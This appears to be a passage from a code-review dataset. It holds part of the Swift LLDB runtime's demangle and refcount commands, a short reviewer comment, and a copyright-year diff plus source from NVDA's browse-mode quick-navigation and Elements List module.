(!node_ptr) return; std::string indent(2 * depth, ' '); stream.Printf("%s", indent.c_str()); stream.Printf("kind=%s", SwiftDemangleNodeKindToCString(node_ptr->getKind())); if (node_ptr->hasText()) { std::string Text = node_ptr->getText(); stream.Printf(", text=\"%s\"", Text.c_str()); } if (node_ptr->hasIndex()) stream.Printf(", index=%" PRIu64, node_ptr->getIndex()); stream.Printf("\n"); for (auto &&child : *node_ptr) { PrintNode(child, stream, depth + 1); } } bool DoExecute(Args &command, CommandReturnObject &result) { for (size_t i = 0; i < command.GetArgumentCount(); i++) { const char *arg = command.GetArgumentAtIndex(i); if (arg && *arg) { swift::Demangle::Context demangle_ctx; auto node_ptr = demangle_ctx.demangleSymbolAsNode(llvm::StringRef(arg)); if (node_ptr) { if (m_options.m_expand) { PrintNode(node_ptr, result.GetOutputStream()); } result.GetOutputStream().Printf( "%s ---> %s\n", arg, swift::Demangle::nodeToString(node_ptr).c_str()); } } } result.SetStatus(lldb::eReturnStatusSuccessFinishResult); return true; } CommandOptions m_options; }; class CommandObjectSwift_RefCount : public CommandObjectRaw { public: CommandObjectSwift_RefCount(CommandInterpreter &interpreter) : CommandObjectRaw(interpreter, "refcount", "Inspect the reference count data for a Swift object", "language swift refcount", eCommandProcessMustBePaused | eCommandRequiresFrame) {} ~CommandObjectSwift_RefCount() {} virtual Options *GetOptions() { return nullptr; } private: enum class ReferenceCountType { eReferenceStrong, eReferenceUnowned, eReferenceWeak, }; llvm::Optional<uint32_t> getReferenceCount(StringRef ObjName, ReferenceCountType Type, ExecutionContext &exe_ctx, StackFrameSP &Frame) { std::string Kind; switch (Type) { case ReferenceCountType::eReferenceStrong: Kind = ""; break; case ReferenceCountType::eReferenceUnowned: Kind = "Unowned"; break; case ReferenceCountType::eReferenceWeak: Kind = "Weak"; break; } EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); ValueObjectSP result_valobj_sp; std::string Expr = (llvm::Twine("Swift._get") + Kind + llvm::Twine("RetainCount(") + ObjName + llvm::Twine(")")) .str(); bool evalStatus = exe_ctx.GetTargetSP()->EvaluateExpression( Expr, Frame.get(), result_valobj_sp, eval_options); if (evalStatus != eExpressionCompleted) return llvm::None; bool success = false; uint32_t count = result_valobj_sp->GetSyntheticValue()->GetValueAsUnsigned( UINT32_MAX, &success); if (!success) return llvm::None; return count; } protected: bool DoExecute(llvm::StringRef command, CommandReturnObject &result) { StackFrameSP frame_sp(m_exe_ctx.GetFrameSP()); EvaluateExpressionOptions options; options.SetLanguage(lldb::eLanguageTypeSwift); options.SetResultIsInternal(true); ValueObjectSP result_valobj_sp; // We want to evaluate first the object we're trying to get the // refcount of, in order, to, e.g. see whether it's available. // So, given `language swift refcount patatino`, we try to // evaluate `expr patatino` and fail early in case there is // an error. bool evalStatus = m_exe_ctx.GetTargetSP()->EvaluateExpression( command, frame_sp.get(), result_valobj_sp, options); if (evalStatus != eExpressionCompleted) { result.SetStatus(lldb::eReturnStatusFailed); if (result_valobj_sp && result_valobj_sp->GetError().Fail()) result.AppendError(result_valobj_sp->GetError().AsCString()); return false; } // At this point, we're sure we're grabbing in our hands a valid // object and we can ask questions about it. `refcounts` are only // defined on class objects, so we throw an error in case we're // trying to look at something else. result_valobj_sp = result_valobj_sp->GetQualifiedRepresentationIfAvailable( lldb::eDynamicCanRunTarget, true); CompilerType result_type(result_valobj_sp->GetCompilerType()); if (!(result_type.GetTypeInfo() & lldb::eTypeInstanceIsPointer)) { result.AppendError("refcount only available for class types"); result.SetStatus(lldb::eReturnStatusFailed); return false; } // Ask swift debugger support in the compiler about the objects // reference counts, and return them to the user. llvm::Optional<uint32_t> strong = getReferenceCount( command, ReferenceCountType::eReferenceStrong, m_exe_ctx, frame_sp); llvm::Optional<uint32_t> unowned = getReferenceCount( command, ReferenceCountType::eReferenceUnowned, m_exe_ctx, frame_sp); llvm::Optional<uint32_t> weak = getReferenceCount( command, ReferenceCountType::eReferenceWeak, m_exe_ctx, frame_sp); std::string unavailable = "<unavailable>"; result.AppendMessageWithFormat( "refcount data: (strong = %s, unowned = %s, weak = %s)\n", strong ? std::to_string(*strong).c_str() : unavailable.c_str(), unowned ? std::to_string(*unowned).c_str() : unavailable.c_str(), weak ? std::to_string(*weak).c_str() : unavailable.c_str()); result.SetStatus(lldb::eReturnStatusSuccessFinishResult); return true; } }; class CommandObjectMultiwordSwift : public CommandObjectMultiword { public: CommandObjectMultiwordSwift(CommandInterpreter &interpreter) : CommandObjectMultiword( interpreter, "swift", "A set of commands for operating on the Swift Language Runtime.", "swift <subcommand> [<subcommand-options>]") { LoadSubCommand("demangle", CommandObjectSP(new CommandObjectSwift_Demangle( interpreter))); LoadSubCommand("refcount", CommandObjectSP(new CommandObjectSwift_RefCount( interpreter))); } virtual ~CommandObjectMultiwordSwift() {} }; void SwiftLanguageRuntime::Initialize() { PluginManager::RegisterPlugin( GetPluginNameStatic(), "Language runtime for the Swift language", CreateInstance, [](CommandInterpreter &interpreter) -> lldb::CommandObjectSP { return CommandObjectSP(new CommandObjectMultiwordSwift(interpreter)); }, GetBreakpointExceptionPrecondition); } void SwiftLanguageRuntime::Terminate() { PluginManager::UnregisterPlugin(CreateInstance); } lldb_private::ConstString SwiftLanguageRuntime::GetPluginNameStatic() { static ConstString g_name("swift"); return g_name; } //------------------------------------------------------------------ // PluginInterface protocol //------------------------------------------------------------------ lldb_private::ConstString SwiftLanguageRuntime::GetPluginName() { return GetPluginNameStatic(); } uint32_t SwiftLanguageRuntime::GetPluginVersion() { return 1; }
1
19,909
Do you want to make this an assertion instead?
apple-swift-lldb
cpp
@@ -1,5 +1,5 @@ #A part of NonVisual Desktop Access (NVDA) -#Copyright (C) 2015 NV Access Limited +#Copyright (C) 2016 NV Access Limited #This file is covered by the GNU General Public License. #See the file COPYING for more details.
1
#A part of NonVisual Desktop Access (NVDA) #Copyright (C) 2015 NV Access Limited #This file is covered by the GNU General Public License. #See the file COPYING for more details. import itertools import collections import winsound import time import weakref import wx import queueHandler from logHandler import log import review import scriptHandler import eventHandler import nvwave import queueHandler import gui import ui import cursorManager from scriptHandler import isScriptWaiting, willSayAllResume import aria import controlTypes import config import textInfos import braille import speech import sayAllHandler import treeInterceptorHandler import inputCore import api from NVDAObjects import NVDAObject REASON_QUICKNAV = "quickNav" def reportPassThrough(treeInterceptor,onlyIfChanged=True): """Reports the pass through mode if it has changed. @param treeInterceptor: The current Browse Mode treeInterceptor. @type treeInterceptor: L{BrowseModeTreeInterceptor} @param onlyIfChanged: if true reporting will not happen if the last reportPassThrough reported the same thing. @type onlyIfChanged: bool """ if not onlyIfChanged or treeInterceptor.passThrough != reportPassThrough.last: if config.conf["virtualBuffers"]["passThroughAudioIndication"]: sound = r"waves\focusMode.wav" if treeInterceptor.passThrough else r"waves\browseMode.wav" nvwave.playWaveFile(sound) else: if treeInterceptor.passThrough: ui.message(_("focus mode")) else: ui.message(_("browse mode")) reportPassThrough.last = treeInterceptor.passThrough reportPassThrough.last = False def mergeQuickNavItemIterators(iterators,direction="next"): """ Merges multiple iterators that emit L{QuickNavItem} objects, yielding them from first to last. They are sorted using min or max (__lt__ should be implemented on the L{QuickNavItem} objects). @param iters: the iterators you want to merge. @type iters: sequence of iterators that emit L{QuicknavItem} objects. @param direction: the direction these iterators are searching (e.g. next, previuos) @type direction: string """ finder=min if direction=="next" else max curValues=[] # Populate a list with all iterators and their corisponding first value for it in iterators: try: val=next(it) except StopIteration: continue curValues.append((it,val)) # Until all iterators have been used up, # Find the first (minimum or maximum) of all the values, # emit that, and update the list with the next available value for the iterator who's value was emitted. while len(curValues)>0: first=finder(curValues,key=lambda x: x[1]) curValues.remove(first) it,val=first yield val try: newVal=next(it) except StopIteration: continue curValues.append((it,newVal)) class QuickNavItem(object): """ Emitted by L{BrowseModeTreeInterceptor._iterNodesByType}, this represents one of many positions in a browse mode document, based on the type of item being searched for (e.g. link, heading, table etc).""" itemType=None #: The type of items searched for (e.g. link, heading, table etc) label=None #: The label that should represent this item in the Elements list. isAfterSelection=False #: Is this item positioned after the caret in the document? Used by the elements list to plae its own selection. def __init__(self,itemType,document): """ @param itemType: the type that was searched for (e.g. link, heading, table etc) @ type itemType: string @ param document: the browse mode document this item is a part of. @type document: L{BrowseModeTreeInterceptor} """ self.itemType=itemType self.document=document def isChild(self,parent): """ Is this item a child of the given parent? This is used when representing items in a hierarchical tree structure, such as the Elements List. @param parent: the item of whom this item may be a child of. @type parent: L{QuickNavItem} @return: True if this item is a child, false otherwise. @rtype: bool """ raise NotImplementedError def report(self,readUnit=None): """ Reports the contents of this item. @param readUnit: the optional unit (e.g. line, paragraph) that should be used to announce the item position when moved to. If not given, then the full sise of the item is used. @type readUnit: a L{textInfos}.UNIT_* constant. """ raise NotImplementedError def moveTo(self): """ Moves the browse mode caret or focus to this item. """ raise NotImplementedError def activate(self): """ Activates this item's position. E.g. follows a link, presses a button etc. """ raise NotImplementedError def rename(self,newName): """ Renames this item with the new name. """ raise NotImplementedError @property def isRenameAllowed(self): return False class TextInfoQuickNavItem(QuickNavItem): """ Represents a quick nav item in a browse mode document who's positions are represented by a L{textInfos.TextInfo}. """ def __init__(self,itemType,document,textInfo): """ See L{QuickNavItem.__init__} for itemType and document argument definitions. @param textInfo: the textInfo position this item represents. @type textInfo: L{textInfos.TextInfo} """ self.textInfo=textInfo super(TextInfoQuickNavItem,self).__init__(itemType,document) def __lt__(self,other): return self.textInfo.compareEndPoints(other.textInfo,"startToStart")<0 @property def obj(self): return self.textInfo.basePosition if isinstance(self.textInfo.basePosition,NVDAObject) else None @property def label(self): return self.textInfo.text.strip() def isChild(self,parent): if parent.textInfo.isOverlapping(self.textInfo): return True return False def report(self,readUnit=None): info=self.textInfo if readUnit: fieldInfo = info.copy() info.collapse() info.move(readUnit, 1, endPoint="end") if info.compareEndPoints(fieldInfo, "endToEnd") > 0: # We've expanded past the end of the field, so limit to the end of the field. info.setEndPoint(fieldInfo, "endToEnd") speech.speakTextInfo(info, reason=controlTypes.REASON_FOCUS) def activate(self): self.textInfo.obj._activatePosition(self.textInfo) def moveTo(self): info=self.textInfo.copy() info.collapse() self.document._set_selection(info,reason=REASON_QUICKNAV) @property def isAfterSelection(self): caret=self.document.makeTextInfo(textInfos.POSITION_CARET) return self.textInfo.compareEndPoints(caret, "startToStart") > 0 class BrowseModeTreeInterceptor(treeInterceptorHandler.TreeInterceptor): scriptCategory = inputCore.SCRCAT_BROWSEMODE def _get_shouldTrapNonCommandGestures(self): return config.conf['virtualBuffers']['trapNonCommandGestures'] def script_trapNonCommandGesture(self,gesture): winsound.PlaySound("default",1) singleLetterNavEnabled=True #: Whether single letter navigation scripts should be active (true) or if these letters should fall to the application. def getAlternativeScript(self,gesture,script): if self.passThrough or not gesture.isCharacter: return script if not self.singleLetterNavEnabled: return None if not script and self.shouldTrapNonCommandGestures: script=self.script_trapNonCommandGesture return script def script_toggleSingleLetterNav(self,gesture): if self.singleLetterNavEnabled: self.singleLetterNavEnabled=False # Translators: Reported when single letter navigation in browse mode is turned off. ui.message(_("Single letter navigation off")) else: self.singleLetterNavEnabled=True # Translators: Reported when single letter navigation in browse mode is turned on. ui.message(_("Single letter navigation on")) # Translators: the description for the toggleSingleLetterNavigation command in browse mode. script_toggleSingleLetterNav.__doc__=_("Toggles single letter navigation on and off. When on, single letter keys in browse mode jump to various kinds of elements on the page. When off, these keys are passed to the application") def _get_ElementsListDialog(self): return ElementsListDialog def _iterNodesByType(self,itemType,direction="next",pos=None): """ Yields L{QuickNavItem} objects representing the ordered positions in this document according to the type being searched for (e.g. link, heading, table etc). @param itemType: the type being searched for (e.g. link, heading, table etc) @type itemType: string @param direction: the direction in which to search (next, previous, up) @ type direction: string @param pos: the position in the document from where to seart the search. @type pos: Usually an L{textInfos.TextInfo} @raise NotImplementedError: This type is not supported by this BrowseMode implementation """ raise NotImplementedError def _iterNotLinkBlock(self, direction="next", pos=None): raise NotImplementedError def _quickNavScript(self,gesture, itemType, direction, errorMessage, readUnit): if itemType=="notLinkBlock": iterFactory=self._iterNotLinkBlock else: iterFactory=lambda direction,info: self._iterNodesByType(itemType,direction,info) info=self.selection try: item = next(iterFactory(direction, info)) except NotImplementedError: # Translators: a message when a particular quick nav command is not supported in the current document. ui.message(_("Not supported in this document")) return except StopIteration: ui.message(errorMessage) return item.moveTo() if not gesture or not willSayAllResume(gesture): item.report(readUnit=readUnit) @classmethod def addQuickNav(cls, itemType, key, nextDoc, nextError, prevDoc, prevError, readUnit=None): scriptSuffix = itemType[0].upper() + itemType[1:] scriptName = "next%s" % scriptSuffix funcName = "script_%s" % scriptName script = lambda self,gesture: self._quickNavScript(gesture, itemType, "next", nextError, readUnit) script.__doc__ = nextDoc script.__name__ = funcName script.resumeSayAllMode=sayAllHandler.CURSOR_CARET setattr(cls, funcName, script) cls.__gestures["kb:%s" % key] = scriptName scriptName = "previous%s" % scriptSuffix funcName = "script_%s" % scriptName script = lambda self,gesture: self._quickNavScript(gesture, itemType, "previous", prevError, readUnit) script.__doc__ = prevDoc script.__name__ = funcName script.resumeSayAllMode=sayAllHandler.CURSOR_CARET setattr(cls, funcName, script) cls.__gestures["kb:shift+%s" % key] = scriptName def script_elementsList(self,gesture): # We need this to be a modal dialog, but it mustn't block this script. def run(): gui.mainFrame.prePopup() d = self.ElementsListDialog(self) d.ShowModal() d.Destroy() gui.mainFrame.postPopup() wx.CallAfter(run) # Translators: the description for the Elements List command in browse mode. script_elementsList.__doc__ = _("Lists various types of elements in this document") def _activatePosition(self): raise NotImplementedError def script_activatePosition(self,gesture): self._activatePosition() # Translators: the description for the activatePosition script on browseMode documents. script_activatePosition.__doc__ = _("activates the current object in the document") __gestures={ "kb:NVDA+f7": "elementsList", "kb:enter": "activatePosition", "kb:space": "activatePosition", "kb:NVDA+shift+space":"toggleSingleLetterNav", } # Add quick navigation scripts. qn = BrowseModeTreeInterceptor.addQuickNav qn("heading", key="h", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading")) qn("heading1", key="1", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 1"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 1"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 1"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 1")) qn("heading2", key="2", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 2"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 2"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 2"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 2")) qn("heading3", key="3", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 3"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 3"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 3"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 3")) qn("heading4", key="4", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 4"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 4"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 4"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 4")) qn("heading5", key="5", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 5"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 5"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 5"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 5")) qn("heading6", key="6", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 6"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 6"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 6"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 6")) qn("table", key="t", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next table"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next table"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous table"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous table"), readUnit=textInfos.UNIT_LINE) qn("link", key="k", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next link"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next link"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous link"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous link")) qn("visitedLink", key="v", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next visited link"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next visited link"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous visited link"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous visited link")) qn("unvisitedLink", key="u", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next unvisited link"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next unvisited link"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous unvisited link"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous unvisited link")) qn("formField", key="f", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next form field"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next form field"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous form field"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous form field"), readUnit=textInfos.UNIT_LINE) qn("list", key="l", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next list"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next list"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous list"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous list"), readUnit=textInfos.UNIT_LINE) qn("listItem", key="i", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next list item"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next list item"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous list item"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous list item")) qn("button", key="b", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next button"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next button"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous button"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous button")) qn("edit", key="e", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next edit field"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next edit field"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous edit field"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous edit field"), readUnit=textInfos.UNIT_LINE) qn("frame", key="m", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next frame"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next frame"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous frame"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous frame"), readUnit=textInfos.UNIT_LINE) qn("separator", key="s", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next separator"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next separator"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous separator"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous separator")) qn("radioButton", key="r", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next radio button"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next radio button"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous radio button"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous radio button")) qn("comboBox", key="c", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next combo box"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next combo box"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous combo box"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous combo box")) qn("checkBox", key="x", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next check box"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next check box"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous check box"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous check box")) qn("graphic", key="g", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next graphic"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next graphic"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous graphic"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous graphic")) qn("blockQuote", key="q", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next block quote"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next block quote"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous block quote"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous block quote")) qn("notLinkBlock", key="n", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("skips forward past a block of links"), # Translators: Message presented when the browse mode element is not found. nextError=_("no more text after a block of links"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("skips backward past a block of links"), # Translators: Message presented when the browse mode element is not found. prevError=_("no more text before a block of links"), readUnit=textInfos.UNIT_LINE) qn("landmark", key="d", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next landmark"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next landmark"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous landmark"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous landmark"), readUnit=textInfos.UNIT_LINE) qn("embeddedObject", key="o", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next embedded object"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next embedded object"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous embedded object"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous embedded object")) qn("annotation", key="a", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next annotation"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next annotation"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous annotation"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous annotation")) del qn class ElementsListDialog(wx.Dialog): ELEMENT_TYPES = ( # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("link", _("Lin&ks")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("heading", _("&Headings")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("landmark", _("Lan&dmarks")), ) Element = collections.namedtuple("Element", ("item", "parent")) lastSelectedElementType=0 def __init__(self, document): self.document = document # Translators: The title of the browse mode Elements List dialog. super(ElementsListDialog, self).__init__(gui.mainFrame, wx.ID_ANY, _("Elements List")) mainSizer = wx.BoxSizer(wx.VERTICAL) # Translators: The label of a group of radio buttons to select the type of element # in the browse mode Elements List dialog. child = wx.RadioBox(self, wx.ID_ANY, label=_("Type:"), choices=tuple(et[1] for et in self.ELEMENT_TYPES)) child.SetSelection(self.lastSelectedElementType) child.Bind(wx.EVT_RADIOBOX, self.onElementTypeChange) mainSizer.Add(child,proportion=1) self.tree = wx.TreeCtrl(self, wx.ID_ANY, style=wx.TR_HAS_BUTTONS | wx.TR_HIDE_ROOT | wx.TR_SINGLE | wx.TR_EDIT_LABELS) self.tree.Bind(wx.EVT_SET_FOCUS, self.onTreeSetFocus) self.tree.Bind(wx.EVT_CHAR, self.onTreeChar) self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.onTreeLabelEditBegin) self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.onTreeLabelEditEnd) self.treeRoot = self.tree.AddRoot("root") mainSizer.Add(self.tree,proportion=7,flag=wx.EXPAND) sizer = wx.BoxSizer(wx.HORIZONTAL) # Translators: The label of an editable text field to filter the elements # in the browse mode Elements List dialog. label = wx.StaticText(self, wx.ID_ANY, _("&Filter by:")) sizer.Add(label) self.filterEdit = wx.TextCtrl(self, wx.ID_ANY) self.filterEdit.Bind(wx.EVT_TEXT, self.onFilterEditTextChange) sizer.Add(self.filterEdit) mainSizer.Add(sizer,proportion=1) sizer = wx.BoxSizer(wx.HORIZONTAL) # Translators: The label of a button to activate an element # in the browse mode Elements List dialog. self.activateButton = wx.Button(self, wx.ID_ANY, _("&Activate")) self.activateButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(True)) sizer.Add(self.activateButton) # Translators: The label of a button to move to an element # in the browse mode Elements List dialog. self.moveButton = wx.Button(self, wx.ID_ANY, _("&Move to")) self.moveButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(False)) sizer.Add(self.moveButton) sizer.Add(wx.Button(self, wx.ID_CANCEL)) mainSizer.Add(sizer,proportion=1) mainSizer.Fit(self) self.SetSizer(mainSizer) self.tree.SetFocus() self.initElementType(self.ELEMENT_TYPES[self.lastSelectedElementType][0]) self.Center(wx.BOTH | wx.CENTER_ON_SCREEN) def onElementTypeChange(self, evt): elementType=evt.GetInt() # We need to make sure this gets executed after the focus event. # Otherwise, NVDA doesn't seem to get the event. queueHandler.queueFunction(queueHandler.eventQueue, self.initElementType, self.ELEMENT_TYPES[elementType][0]) self.lastSelectedElementType=elementType def initElementType(self, elType): if elType == "link": # Links can be activated. self.activateButton.Enable() self.SetAffirmativeId(self.activateButton.GetId()) else: # No other element type can be activated. self.activateButton.Disable() self.SetAffirmativeId(self.moveButton.GetId()) # Gather the elements of this type. self._elements = [] self._initialElement = None parentElements = [] isAfterSelection=False for item in self.document._iterNodesByType(elType): # Find the parent element, if any. for parent in reversed(parentElements): if item.isChild(parent.item): break else: # We're not a child of this parent, so this parent has no more children and can be removed from the stack. parentElements.pop() else: # No parent found, so we're at the root. # Note that parentElements will be empty at this point, as all parents are no longer relevant and have thus been removed from the stack. parent = None element=self.Element(item,parent) self._elements.append(element) if not isAfterSelection: isAfterSelection=item.isAfterSelection if not isAfterSelection: # The element immediately preceding or overlapping the caret should be the initially selected element. # Since we have not yet passed the selection, use this as the initial element. try: self._initialElement = self._elements[-1] except IndexError: # No previous element. pass # This could be the parent of a subsequent element, so add it to the parents stack. parentElements.append(element) # Start with no filtering. self.filterEdit.ChangeValue("") self.filter("", newElementType=True) def filter(self, filterText, newElementType=False): # If this is a new element type, use the element nearest the cursor. # Otherwise, use the currently selected element. defaultElement = self._initialElement if newElementType else self.tree.GetItemPyData(self.tree.GetSelection()) # Clear the tree. self.tree.DeleteChildren(self.treeRoot) # Populate the tree with elements matching the filter text. elementsToTreeItems = {} defaultItem = None matched = False #Do case-insensitive matching by lowering both filterText and each element's text. filterText=filterText.lower() for element in self._elements: if filterText and filterText not in element.item.label.lower(): continue matched = True parent = element.parent if parent: parent = elementsToTreeItems.get(parent) item = self.tree.AppendItem(parent or self.treeRoot, element.item.label) self.tree.SetItemPyData(item, element) elementsToTreeItems[element] = item if element == defaultElement: defaultItem = item self.tree.ExpandAll() if not matched: # No items, so disable the buttons. self.activateButton.Disable() self.moveButton.Disable() return # If there's no default item, use the first item in the tree. self.tree.SelectItem(defaultItem or self.tree.GetFirstChild(self.treeRoot)[0]) # Enable the button(s). # If the activate button isn't the default button, it is disabled for this element type and shouldn't be enabled here. if self.AffirmativeId == self.activateButton.Id: self.activateButton.Enable() self.moveButton.Enable() def onTreeSetFocus(self, evt): # Start with no search. self._searchText = "" self._searchCallLater = None evt.Skip() def onTreeChar(self, evt): key = evt.KeyCode if key == wx.WXK_RETURN: # The enter key should be propagated to the dialog and thus activate the default button, # but this is broken (wx ticket #3725). # Therefore, we must catch the enter key here. # Activate the current default button. evt = wx.CommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_ANY) button = self.FindWindowById(self.AffirmativeId) if button.Enabled: button.ProcessEvent(evt) else: wx.Bell() elif key == wx.WXK_F2: item=self.tree.GetSelection() if item: selectedItemType=self.tree.GetItemPyData(item).item self.tree.EditLabel(item) evt.Skip() elif key >= wx.WXK_START or key == wx.WXK_BACK: # Non-printable character. self._searchText = "" evt.Skip() else: # Search the list. # We have to implement this ourselves, as tree views don't accept space as a search character. char = unichr(evt.UnicodeKey).lower() # IF the same character is typed twice, do the same search. if self._searchText != char: self._searchText += char if self._searchCallLater: self._searchCallLater.Restart() else: self._searchCallLater = wx.CallLater(1000, self._clearSearchText) self.search(self._searchText) def onTreeLabelEditBegin(self,evt): item=self.tree.GetSelection() selectedItemType = self.tree.GetItemPyData(item).item if not selectedItemType.isRenameAllowed: evt.Veto() def onTreeLabelEditEnd(self,evt): selectedItemNewName=evt.GetLabel() item=self.tree.GetSelection() selectedItemType = self.tree.GetItemPyData(item).item selectedItemType.rename(selectedItemNewName) def _clearSearchText(self): self._searchText = "" def search(self, searchText): item = self.tree.GetSelection() if not item: # No items. return # First try searching from the current item. # Failing that, search from the first item. items = itertools.chain(self._iterReachableTreeItemsFromItem(item), self._iterReachableTreeItemsFromItem(self.tree.GetFirstChild(self.treeRoot)[0])) if 